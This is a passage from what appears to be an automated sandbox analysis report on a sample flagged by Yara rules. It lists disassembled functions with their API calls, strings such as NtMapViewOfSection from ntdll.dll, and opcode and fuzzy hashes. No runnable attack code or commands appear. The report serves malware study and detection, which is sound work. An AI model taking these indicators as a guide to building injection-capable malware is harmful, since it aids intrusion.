                  • Part of subcall function 0389D1C8: _errno.LIBCMT ref: 0389D261
                • free.LIBCMT ref: 038842AF
                • free.LIBCMT ref: 038842B7
                • free.LIBCMT ref: 038842BF
                • free.LIBCMT ref: 038842CB
                • free.LIBCMT ref: 038842D8
                Memory Dump Source
                • Source File: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                • Associated: 00000000.00000002.4095284653.00000000038C5000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000000.00000002.4095284653.00000000038C8000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000000.00000002.4095284653.00000000038CC000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000000.00000002.4095284653.00000000038D0000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3880000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: free$_errno$_callnewhmalloc$AllocHeap
                • String ID:
                • API String ID: 996410232-0
                • Opcode ID: 5fea0d21cf2f5f2329f70d6c53ffcf1dedb90211f69b270b285c9b89b2a82962
                • Instruction ID: 316ce4aae117854ff062b66492fedff4b67f227bc7315624799eb3b03c653255
                • Opcode Fuzzy Hash: 5fea0d21cf2f5f2329f70d6c53ffcf1dedb90211f69b270b285c9b89b2a82962
                • Instruction Fuzzy Hash: 434101273047929BDA15EBBBA95036EA754B749BC0F8885A5CF0A8B705EF38D426C304
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                • Associated: 00000000.00000002.4095284653.00000000038C5000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000000.00000002.4095284653.00000000038C8000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000000.00000002.4095284653.00000000038CC000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000000.00000002.4095284653.00000000038D0000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3880000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: htonl$freemalloc
                • String ID: zyxwvutsrqponmlk
                • API String ID: 1249573706-3884694604
                • Opcode ID: 4b290ff5cfd48bf3310a40f8a31e8720a67139a53a8d0e20d742a567524f9ec5
                • Instruction ID: cc444657692136afe264f49c1a6e668a00dee0f1e72a8d9ba053fcd52f60d67d
                • Opcode Fuzzy Hash: 4b290ff5cfd48bf3310a40f8a31e8720a67139a53a8d0e20d742a567524f9ec5
                • Instruction Fuzzy Hash: E721F82630174046EF14EBFAA95022DA6D1EB89BD4F4840F9DE49CBB59EE3CD4468301
                APIs
                • GetModuleHandleA.KERNEL32 ref: 03892913
                • GetProcAddress.KERNEL32 ref: 03892923
                • GetLastError.KERNEL32 ref: 038929EB
                  • Part of subcall function 0389ADBC: GetCurrentProcess.KERNEL32 ref: 0389AE49
                  • Part of subcall function 0389B220: GetCurrentProcess.KERNEL32 ref: 0389B24D
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                • Associated: 00000000.00000002.4095284653.00000000038C5000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000000.00000002.4095284653.00000000038C8000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000000.00000002.4095284653.00000000038CC000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000000.00000002.4095284653.00000000038D0000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3880000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: CurrentProcess$AddressErrorHandleLastModuleProc
                • String ID: NtMapViewOfSection$ntdll.dll
                • API String ID: 1006775078-3170647572
                • Opcode ID: fb54ca6ed3380a5d95a5950137548b411ea98ddaf41e8d9134b8dda9b5f794fd
                • Instruction ID: 734c4645aaeec7e08f3dc0522aebe72db6c7e13f384c40880ad3c86913f0ec45
                • Opcode Fuzzy Hash: fb54ca6ed3380a5d95a5950137548b411ea98ddaf41e8d9134b8dda9b5f794fd
                • Instruction Fuzzy Hash: 4F31C37671074482EB14DBA6F45872AB3E0F788BB4F58436AEE690BB94DF3CC5458740
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.4094583277.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.4094558739.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.4094583277.000000000040C000.00000040.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.4094629675.000000000040D000.00000080.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.4094651561.000000000040E000.00000040.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.4094673415.000000000040F000.00000004.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_k2vUsu5VZ5.jbxd
                Similarity
                • API ID: signal
                • String ID: CCG
                • API String ID: 1946981877-1584390748
                • Opcode ID: 02ca0884ae1087a20c21e45c5c541f93375eef4ab3a09d0df9e107311897ccd7
                • Instruction ID: 8a37928041284c8a434aeccdd4db6f983c568c8f0cf3e4f2934023fa32f313ab
                • Opcode Fuzzy Hash: 02ca0884ae1087a20c21e45c5c541f93375eef4ab3a09d0df9e107311897ccd7
                • Instruction Fuzzy Hash: C321A171B0154146EE296279865D33B10019B9A374F284E379A3DA73E0DEFECCC2830E
                APIs
                • malloc.LIBCMT ref: 038912CA
                  • Part of subcall function 0389D1C8: _FF_MSGBANNER.LIBCMT ref: 0389D1F8
                  • Part of subcall function 0389D1C8: _NMSG_WRITE.LIBCMT ref: 0389D202
                  • Part of subcall function 0389D1C8: HeapAlloc.KERNEL32 ref: 0389D21D
                  • Part of subcall function 0389D1C8: _callnewh.LIBCMT ref: 0389D236
                  • Part of subcall function 0389D1C8: _errno.LIBCMT ref: 0389D241
                  • Part of subcall function 0389D1C8: _errno.LIBCMT ref: 0389D24C
                • _snprintf.LIBCMT ref: 038912E9
                  • Part of subcall function 0389D57C: _errno.LIBCMT ref: 0389D5B3
                  • Part of subcall function 0389D57C: _invalid_parameter_noinfo.LIBCMT ref: 0389D5BE
                • remove.LIBCMT ref: 038912F5
                • remove.LIBCMT ref: 038912FC
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                • Associated: 00000000.00000002.4095284653.00000000038C5000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000000.00000002.4095284653.00000000038C8000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000000.00000002.4095284653.00000000038CC000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000000.00000002.4095284653.00000000038D0000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3880000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: _errno$remove$AllocHeap_callnewh_invalid_parameter_noinfo_snprintfmalloc
                • String ID: %s\%s
                • API String ID: 1896346573-4073750446
                • Opcode ID: 116c8ba16e338bd99988bf90a74e2fe71a7e1b136674968703a12a75dd4b6793
                • Instruction ID: 9dbbb54499963032ac66cc4fcf2670def3cc7d57c4dcf296ea2a249400efcb33
                • Opcode Fuzzy Hash: 116c8ba16e338bd99988bf90a74e2fe71a7e1b136674968703a12a75dd4b6793
                • Instruction Fuzzy Hash: A5F0B42A608750C5EA00EB96B80026AF360E788FD0F5C41A3EF899BB19CF38C4518788
                APIs
                  • Part of subcall function 03493B83: malloc.LIBCMT ref: 03493B9F
                • malloc.LIBCMT ref: 0348BF65
                  • Part of subcall function 0349C60F: _FF_MSGBANNER.LIBCMT ref: 0349C63F
                  • Part of subcall function 0349C60F: _NMSG_WRITE.LIBCMT ref: 0349C649
                  • Part of subcall function 0349C60F: _callnewh.LIBCMT ref: 0349C67D
                  • Part of subcall function 0349C60F: _errno.LIBCMT ref: 0349C688
                  • Part of subcall function 0349C60F: _errno.LIBCMT ref: 0349C693
                  • Part of subcall function 0349BE7F: malloc.LIBCMT ref: 0349BECF
                  • Part of subcall function 0349BE7F: realloc.LIBCMT ref: 0349BEDE
                • malloc.LIBCMT ref: 0348C057
                • _snprintf.LIBCMT ref: 0348C0D5
                • _snprintf.LIBCMT ref: 0348C0FD
                • _snprintf.LIBCMT ref: 0348C124
                • free.LIBCMT ref: 0348C292
                  • Part of subcall function 0349875B: malloc.LIBCMT ref: 0349878F
                  • Part of subcall function 0349875B: free.LIBCMT ref: 03498946
                Memory Dump Source
                • Source File: 00000000.00000002.4095150845.0000000003480000.00000040.00001000.00020000.00000000.sdmp, Offset: 03480000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3480000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: malloc$_snprintf$_errnofree$_callnewhrealloc
                • String ID:
                • API String ID: 2667508507-0
                • Opcode ID: 640527ed828b8086bb4541aa1f9c63a5ff0a17add3c1388993af7cef0feedb0d
                • Instruction ID: 68b15920bc2fe33cdbdcb833118f955c616b3371046ffe64834756bd9d8424b3
                • Opcode Fuzzy Hash: 640527ed828b8086bb4541aa1f9c63a5ff0a17add3c1388993af7cef0feedb0d
                • Instruction Fuzzy Hash: 85A195387087044FEF58FF7A989467E76D6EBD9200F40452F994ACF290EE38D905879A
                APIs
                  • Part of subcall function 03493B83: malloc.LIBCMT ref: 03493B9F
                  • Part of subcall function 0349D9A7: _errno.LIBCMT ref: 0349D8FE
                  • Part of subcall function 0349D9A7: _invalid_parameter_noinfo.LIBCMT ref: 0349D909
                • fseek.LIBCMT ref: 0348FE6F
                  • Part of subcall function 0349E22B: _errno.LIBCMT ref: 0349E253
                  • Part of subcall function 0349E22B: _invalid_parameter_noinfo.LIBCMT ref: 0349E25E
                • _ftelli64.LIBCMT ref: 0348FE77
                  • Part of subcall function 0349E29F: _errno.LIBCMT ref: 0349E2BD
                  • Part of subcall function 0349E29F: _invalid_parameter_noinfo.LIBCMT ref: 0349E2C8
                • fseek.LIBCMT ref: 0348FE87
                  • Part of subcall function 0349E22B: _fseek_nolock.LIBCMT ref: 0349E27C
                • malloc.LIBCMT ref: 0348FEC7
                  • Part of subcall function 0349C60F: _FF_MSGBANNER.LIBCMT ref: 0349C63F
                  • Part of subcall function 0349C60F: _NMSG_WRITE.LIBCMT ref: 0349C649
                  • Part of subcall function 0349C60F: _callnewh.LIBCMT ref: 0349C67D
                  • Part of subcall function 0349C60F: _errno.LIBCMT ref: 0349C688
                  • Part of subcall function 0349C60F: _errno.LIBCMT ref: 0349C693
                • fclose.LIBCMT ref: 0348FF84
                Memory Dump Source
                • Source File: 00000000.00000002.4095150845.0000000003480000.00000040.00001000.00020000.00000000.sdmp, Offset: 03480000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3480000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: _errno$_invalid_parameter_noinfo$fseekmalloc$_callnewh_fseek_nolock_ftelli64fclose
                • String ID:
                • API String ID: 2887643383-0
                • Opcode ID: fedb8edbf5c7940b4ea62b88292aea04c11e351a8cff1d0d25e5b743e65c6225
                • Instruction ID: 2f644f592829a2e94d4baac09ea6bf40a8d846e6074b77b0bf592f2a860b81c0
                • Opcode Fuzzy Hash: fedb8edbf5c7940b4ea62b88292aea04c11e351a8cff1d0d25e5b743e65c6225
                • Instruction Fuzzy Hash: 0A51B335718B084F9749FB2DA49467E73D1FB89600B40466FE48BCB295EE389D06878A
                APIs
                • _mtinitlocknum.LIBCMT ref: 034A767C
                  • Part of subcall function 034A1153: _FF_MSGBANNER.LIBCMT ref: 034A1170
                  • Part of subcall function 034A1153: _NMSG_WRITE.LIBCMT ref: 034A117A
                • _lock.LIBCMT ref: 034A768F
                • _lock.LIBCMT ref: 034A76EA
                • _calloc_crt.LIBCMT ref: 034A77A1
                Memory Dump Source
                • Source File: 00000000.00000002.4095150845.0000000003480000.00000040.00001000.00020000.00000000.sdmp, Offset: 03480000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3480000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: _lock$_calloc_crt_mtinitlocknum
                • String ID:
                • API String ID: 3962633935-0
                • Opcode ID: 2a29bece4ed9085b659b0b9be8632e4f0adfe9a3631b402b8879efea4faa0534
                • Instruction ID: 7b5c71eb6170a54cc1d2c4c84c1763e0cc1e52f72932375a9a2da509a6369896
                • Opcode Fuzzy Hash: 2a29bece4ed9085b659b0b9be8632e4f0adfe9a3631b402b8879efea4faa0534
                • Instruction Fuzzy Hash: 9751F674518F088FD724DF5CC841266BBD0FB68311F15459ED88ACB265D774E842CB86
                APIs
                • malloc.LIBCMT ref: 03484981
                  • Part of subcall function 0349C60F: _FF_MSGBANNER.LIBCMT ref: 0349C63F
                  • Part of subcall function 0349C60F: _NMSG_WRITE.LIBCMT ref: 0349C649
                  • Part of subcall function 0349C60F: _callnewh.LIBCMT ref: 0349C67D
                  • Part of subcall function 0349C60F: _errno.LIBCMT ref: 0349C688
                  • Part of subcall function 0349C60F: _errno.LIBCMT ref: 0349C693
                • malloc.LIBCMT ref: 0348498C
                  • Part of subcall function 0349C60F: _callnewh.LIBCMT ref: 0349C6A3
                  • Part of subcall function 0349C60F: _errno.LIBCMT ref: 0349C6A8
                • free.LIBCMT ref: 03484A73
                • free.LIBCMT ref: 03484A7B
                • free.LIBCMT ref: 03484A87
                • free.LIBCMT ref: 03484A94
                Memory Dump Source
                • Source File: 00000000.00000002.4095150845.0000000003480000.00000040.00001000.00020000.00000000.sdmp, Offset: 03480000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3480000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: free$_errno$_callnewhmalloc
                • String ID:
                • API String ID: 2761444284-0
                • Opcode ID: 0defe551ebfe3dd8c80660e702d04152503292365c3874501280693d87aa9fc5
                • Instruction ID: 07ccadc6814d77b2b5c4ec55fee561016bd754e95f36546eecf032671980ae5c
                • Opcode Fuzzy Hash: 0defe551ebfe3dd8c80660e702d04152503292365c3874501280693d87aa9fc5
                • Instruction Fuzzy Hash: 6941253520CB1E4FAB29FB6E584217F76D9EB95210704423FD487CB312EE24D8078789
                APIs
                • _invalid_parameter_noinfo.LIBCMT ref: 0349DEDE
                • memcpy_s.LIBCMT ref: 0349DFA3
                • _fileno.LIBCMT ref: 0349E00E
                  • Part of subcall function 034A2D5B: _errno.LIBCMT ref: 034A2D64
                  • Part of subcall function 034A2D5B: _invalid_parameter_noinfo.LIBCMT ref: 034A2D6F
                  • Part of subcall function 034A423F: __doserrno.LIBCMT ref: 034A4279
                  • Part of subcall function 034A423F: _errno.LIBCMT ref: 034A4280
                • _filbuf.LIBCMT ref: 0349E03C
                • _errno.LIBCMT ref: 0349E08C
                Memory Dump Source
                • Source File: 00000000.00000002.4095150845.0000000003480000.00000040.00001000.00020000.00000000.sdmp, Offset: 03480000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3480000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: _errno$_invalid_parameter_noinfo$__doserrno_filbuf_filenomemcpy_s
                • String ID:
                • API String ID: 1812282339-0
                • Opcode ID: f984b88899510e62cbe18468345cbbe3864e5a8b2208229d8901ea8d74a4c81d
                • Instruction ID: 6bf5b853613e0780d94c6fe261e39371db7ade8de752c633886247067b5e3a9d
                • Opcode Fuzzy Hash: f984b88899510e62cbe18468345cbbe3864e5a8b2208229d8901ea8d74a4c81d
                • Instruction Fuzzy Hash: 8341E53172CF194EAF2CDA2D5449139BBD1E7E5621719032FD0AAC7395DE60D89342CA
                APIs
                • _fileno.LIBCMT ref: 0349F6B4
                  • Part of subcall function 034A2D5B: _errno.LIBCMT ref: 034A2D64
                  • Part of subcall function 034A2D5B: _invalid_parameter_noinfo.LIBCMT ref: 034A2D6F
                • _errno.LIBCMT ref: 0349F6C4
                  • Part of subcall function 0349F013: _getptd_noexit.LIBCMT ref: 0349F017
                • _errno.LIBCMT ref: 0349F6E0
                • _isatty.LIBCMT ref: 0349F741
                • _getbuf.LIBCMT ref: 0349F74D
                Memory Dump Source
                • Source File: 00000000.00000002.4095150845.0000000003480000.00000040.00001000.00020000.00000000.sdmp, Offset: 03480000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3480000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: _errno$_fileno_getbuf_getptd_noexit_invalid_parameter_noinfo_isatty
                • String ID:
                • API String ID: 304646821-0
                • Opcode ID: 872796ac68f0a2c990ec7574be4b8262460ebf94b78f5d760dc63ea6db356553
                • Instruction ID: e24a798af435ef5403b0e52380818f1fbe4c227bc22fa2a1107572271e043c0a
                • Opcode Fuzzy Hash: 872796ac68f0a2c990ec7574be4b8262460ebf94b78f5d760dc63ea6db356553
                • Instruction Fuzzy Hash: 7941C130214B084FEF58EF2CC8816667BE1FB48311B58469BD85ACF3A5E774D886C785
                APIs
                • malloc.LIBCMT ref: 03496C82
                  • Part of subcall function 0349C60F: _FF_MSGBANNER.LIBCMT ref: 0349C63F
                  • Part of subcall function 0349C60F: _NMSG_WRITE.LIBCMT ref: 0349C649
                  • Part of subcall function 0349C60F: _callnewh.LIBCMT ref: 0349C67D
                  • Part of subcall function 0349C60F: _errno.LIBCMT ref: 0349C688
                  • Part of subcall function 0349C60F: _errno.LIBCMT ref: 0349C693
                • _snprintf.LIBCMT ref: 03496C9A
                  • Part of subcall function 0349C9C3: _errno.LIBCMT ref: 0349C9FA
                  • Part of subcall function 0349C9C3: _invalid_parameter_noinfo.LIBCMT ref: 0349CA05
                • free.LIBCMT ref: 03496CB1
                  • Part of subcall function 0349C5CF: _errno.LIBCMT ref: 0349C5EF
                • malloc.LIBCMT ref: 03496D01
                • _snprintf.LIBCMT ref: 03496D19
                • free.LIBCMT ref: 03496D41
                Memory Dump Source
                • Source File: 00000000.00000002.4095150845.0000000003480000.00000040.00001000.00020000.00000000.sdmp, Offset: 03480000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3480000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: _errno$_snprintffreemalloc$_callnewh_invalid_parameter_noinfo
                • String ID:
                • API String ID: 761449704-0
                • Opcode ID: 6a658e466ab6b8aceff6db9366090ada30c858ea3a03489b9340fb8c77b34acf
                • Instruction ID: 944fa06059cdadc3be296c57bd2d3556db92d7aa593adc202cc30523df74504e
                • Opcode Fuzzy Hash: 6a658e466ab6b8aceff6db9366090ada30c858ea3a03489b9340fb8c77b34acf
                • Instruction Fuzzy Hash: 4331A72070CA4C0FEB69FB2C68552B97BD2E78D320745829FD49EC7356DE289C528789
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                • Associated: 00000000.00000002.4095284653.00000000038C5000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000000.00000002.4095284653.00000000038C8000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000000.00000002.4095284653.00000000038CC000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000000.00000002.4095284653.00000000038D0000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3880000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: _errno_fileno_flsbuf_flush_getptd_noexit_invalid_parameter_noinfo
                • String ID:
                • API String ID: 1640621425-0
                • Opcode ID: f730a263443016ae00e5d3abb777c2b5d75680efc34748d8f50c96e33ab9094d
                • Instruction ID: cf98c0f8bb50a2a4654917f409006f0fc4c0db8c009dd2368b161de45e2bcfd1
                • Opcode Fuzzy Hash: f730a263443016ae00e5d3abb777c2b5d75680efc34748d8f50c96e33ab9094d
                • Instruction Fuzzy Hash: BA312B2130075446FE3ADEEB954422AFE51B784FE4F1C46A6DFA6C7B94EA78E081C301
                APIs
                • malloc.LIBCMT ref: 0388553A
                  • Part of subcall function 0389D1C8: _FF_MSGBANNER.LIBCMT ref: 0389D1F8
                  • Part of subcall function 0389D1C8: _NMSG_WRITE.LIBCMT ref: 0389D202
                  • Part of subcall function 0389D1C8: HeapAlloc.KERNEL32 ref: 0389D21D
                  • Part of subcall function 0389D1C8: _callnewh.LIBCMT ref: 0389D236
                  • Part of subcall function 0389D1C8: _errno.LIBCMT ref: 0389D241
                  • Part of subcall function 0389D1C8: _errno.LIBCMT ref: 0389D24C
                • malloc.LIBCMT ref: 03885545
                  • Part of subcall function 0389D1C8: _callnewh.LIBCMT ref: 0389D25C
                  • Part of subcall function 0389D1C8: _errno.LIBCMT ref: 0389D261
                • free.LIBCMT ref: 0388562C
                • free.LIBCMT ref: 03885634
                • free.LIBCMT ref: 03885640
                • free.LIBCMT ref: 0388564D
                Memory Dump Source
                • Source File: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                • Associated: 00000000.00000002.4095284653.00000000038C5000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000000.00000002.4095284653.00000000038C8000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000000.00000002.4095284653.00000000038CC000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000000.00000002.4095284653.00000000038D0000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3880000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: free$_errno$_callnewhmalloc$AllocHeap
                • String ID:
                • API String ID: 996410232-0
                • Opcode ID: d59479e3761b4ed4932fddf4fcb50f7cb5c8a88df08afafcd930e07321553fd4
                • Instruction ID: 8150df9d3ea76722faba40fbe3bbab207c2571ab6c0b2c38531adc5f640f8ef2
                • Opcode Fuzzy Hash: d59479e3761b4ed4932fddf4fcb50f7cb5c8a88df08afafcd930e07321553fd4
                • Instruction Fuzzy Hash: 7F315A2231478696EF15EFAA680076EAB59F78ABC8F4D84B1CD45CB701EE38C50BC310
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                • Associated: 00000000.00000002.4095284653.00000000038C5000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000000.00000002.4095284653.00000000038C8000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000000.00000002.4095284653.00000000038CC000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000000.00000002.4095284653.00000000038D0000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3880000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: ByteCharLocaleMultiWide$UpdateUpdate::__errno_isleadbyte_l
                • String ID:
                • API String ID: 2998201375-0
                • Opcode ID: bf73e22792d62dbb2a5a8665747f634ed6f1a0b77ca2749cdd90391f7f3d2e71
                • Instruction ID: 9fa9dda355871f4cc52c1d48509222ef442dac72480a2921fd61d8f202d6d842
                • Opcode Fuzzy Hash: bf73e22792d62dbb2a5a8665747f634ed6f1a0b77ca2749cdd90391f7f3d2e71
                • Instruction Fuzzy Hash: 2631D372215B8086EB60CF59E580229BFE5F784FC4F1C41A6EB99DBB54DB38C442CB10
                APIs
                • malloc.LIBCMT ref: 0348ED04
                  • Part of subcall function 0349C60F: _FF_MSGBANNER.LIBCMT ref: 0349C63F
                  • Part of subcall function 0349C60F: _NMSG_WRITE.LIBCMT ref: 0349C649
                  • Part of subcall function 0349C60F: _callnewh.LIBCMT ref: 0349C67D
                  • Part of subcall function 0349C60F: _errno.LIBCMT ref: 0349C688
                  • Part of subcall function 0349C60F: _errno.LIBCMT ref: 0349C693
                • free.LIBCMT ref: 0348ED3F
                • fwrite.LIBCMT ref: 0348ED80
                • fclose.LIBCMT ref: 0348ED88
                • free.LIBCMT ref: 0348ED95
                  • Part of subcall function 0349C5CF: _errno.LIBCMT ref: 0349C5EF
                Memory Dump Source
                • Source File: 00000000.00000002.4095150845.0000000003480000.00000040.00001000.00020000.00000000.sdmp, Offset: 03480000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3480000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: _errno$free$_callnewhfclosefwritemalloc
                • String ID:
                • API String ID: 1696598829-0
                • Opcode ID: 7f55edad75ff0bbfcf874ce00c2e3ecc23b72eec22338907bae6ad7bfe5dc563
                • Instruction ID: 54c5c91d89d5bdbb62ec02f8119be37c4943bdfe74d9a15384f428edf329bbee
                • Opcode Fuzzy Hash: 7f55edad75ff0bbfcf874ce00c2e3ecc23b72eec22338907bae6ad7bfe5dc563
                • Instruction Fuzzy Hash: 49219F25728F094FEB84FB2D845436E76D1FBD8214F44062FA14ACB384EE28CD46838A
                APIs
                • _errno.LIBCMT ref: 034A7904
                  • Part of subcall function 0349F013: _getptd_noexit.LIBCMT ref: 0349F017
                • __doserrno.LIBCMT ref: 034A78FC
                  • Part of subcall function 0349EFA3: _getptd_noexit.LIBCMT ref: 0349EFA7
                Memory Dump Source
                • Source File: 00000000.00000002.4095150845.0000000003480000.00000040.00001000.00020000.00000000.sdmp, Offset: 03480000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3480000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: _getptd_noexit$__doserrno_errno
                • String ID:
                • API String ID: 2964073243-0
                • Opcode ID: bd3ba21443fd0c50c0a4bf83960b1fd102cab18f9fc9d7b57dd34df66812a4b6
                • Instruction ID: 870a3144ce67cdeb62ab0ce994f54e374475ed6b011616d454620db0de961e49
                • Opcode Fuzzy Hash: bd3ba21443fd0c50c0a4bf83960b1fd102cab18f9fc9d7b57dd34df66812a4b6
                • Instruction Fuzzy Hash: 72F0283452DE094EFB28EBACC8907543E98FF60326F54428BD005CF1E5D77804458B19
                APIs
                • _errno.LIBCMT ref: 038A84BD
                  • Part of subcall function 0389FBCC: _getptd_noexit.LIBCMT ref: 0389FBD0
                • __doserrno.LIBCMT ref: 038A84B5
                  • Part of subcall function 0389FB5C: _getptd_noexit.LIBCMT ref: 0389FB60
                Memory Dump Source
                • Source File: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                • Associated: 00000000.00000002.4095284653.00000000038C5000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000000.00000002.4095284653.00000000038C8000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000000.00000002.4095284653.00000000038CC000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000000.00000002.4095284653.00000000038D0000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3880000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: _getptd_noexit$__doserrno_errno
                • String ID:
                • API String ID: 2964073243-0
                • Opcode ID: bd3ba21443fd0c50c0a4bf83960b1fd102cab18f9fc9d7b57dd34df66812a4b6
                • Instruction ID: 2c7bef50adb2855fa425661782c58dce2b74dcd4ea86c451e8507e8335fc21e1
                • Opcode Fuzzy Hash: bd3ba21443fd0c50c0a4bf83960b1fd102cab18f9fc9d7b57dd34df66812a4b6
                • Instruction Fuzzy Hash: 3AF04FF6612B8485FE09AFACC8903286A519B90B36F599786C629CA3D0CBBC45458726
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                • Associated: 00000000.00000002.4095284653.00000000038C5000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000000.00000002.4095284653.00000000038C8000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000000.00000002.4095284653.00000000038CC000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000000.00000002.4095284653.00000000038D0000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3880000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID: %s!%s
                • API String ID: 0-2935588013
                • Opcode ID: 87c3d06f94ebd67ad8421af21f0b978c410073bf873a78430363920c94c161ce
                • Instruction ID: c89c67f34ac08ddf985ea907177df18064495f032b13eeb874f019a971f0a9e4
                • Opcode Fuzzy Hash: 87c3d06f94ebd67ad8421af21f0b978c410073bf873a78430363920c94c161ce
                • Instruction Fuzzy Hash: 4251BF7A20474486DF24FFA6D0006697365F388F98F4881A6EF8E8B784DF38D94AC745
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                • Associated: 00000000.00000002.4095284653.00000000038C5000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000000.00000002.4095284653.00000000038C8000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000000.00000002.4095284653.00000000038CC000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000000.00000002.4095284653.00000000038D0000.00000040.00001000.00020000.00000000.sdmp
